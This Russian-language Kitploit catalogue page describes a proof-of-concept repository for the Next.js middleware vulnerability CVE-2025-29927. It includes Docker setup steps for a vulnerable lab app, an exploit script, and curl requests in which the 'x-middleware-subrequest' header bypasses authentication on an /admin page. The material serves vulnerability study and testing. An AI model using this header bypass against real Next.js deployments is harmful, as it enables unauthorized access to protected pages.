Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
nextjs-middleware-exploit — Исследование уязвимости в middleware Next.js (CVE-2025-29927), позволяющей обход авторизации и потенциальные эксплойты. | Kitploit
Инструменты/GitHubGitHub/l1uk/nextjs-middleware-exploit
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификацияОбучение и Образование
GitHubl1uk/nextjs-middleware-exploit

nextjs-middleware-exploit

Исследование уязвимости в middleware Next.js (CVE-2025-29927), позволяющей обход авторизации и потенциальные эксплойты.

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Исследование уязвимости промежуточного ПО Next.js (CVE-2025-29927)

Этот репозиторий демонстрирует критическую уязвимость в промежуточном ПО Next.js (CVE-2025-29927), которая затрагивает версии с 11.1.4 по 15.1.7. Эта уязвимость позволяет обход авторизации, обход CSP и потенциальные DoS-атаки через отравление кэша. Проблема возникает из-за обработки заголовка x-middleware-subrequest, что позволяет злоумышленникам обходить механизмы защиты промежуточного ПО.

Эта proof of concept специфична для уязвимости в v12

Использование

Настройка окружения

Настройте уязвимую среду с помощью Docker и файлов из этого репозитория, выполнив:

root@kitploit:~
git clone https://github.com/l1uk/nextjs-middleware-exploit.git
cd nextjs-middleware-exploit
docker build -t my-next-app .
docker run -p 3000:3000 my-next-app

Эксплуатация

В этом репозитории есть уже созданный скрипт exploit.sh для тестирования эксплуатации уязвимости. Чтобы протестировать, выполните:

root@kitploit:~
chmod +x exploit.sh
./exploit.sh

Кроме того, вы можете протестировать эксплуатацию уязвимости, попробовав следующее

  1. Запросите страницу администратора без аутентификации. Вы должны получить перенаправление на страницу login.
root@kitploit:~
curl -i http://localhost:3000/admin
  1. Запросите страницу без аутентификации, но с использованием заголовка x-middleware-subrequest. Вы должны обойти страницу аутентификации.
root@kitploit:~
curl -i -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/admin

Уведомление о безопасности

  • CVE-2025-29927: Ссылка на уведомление о безопасности
Скачать инструмент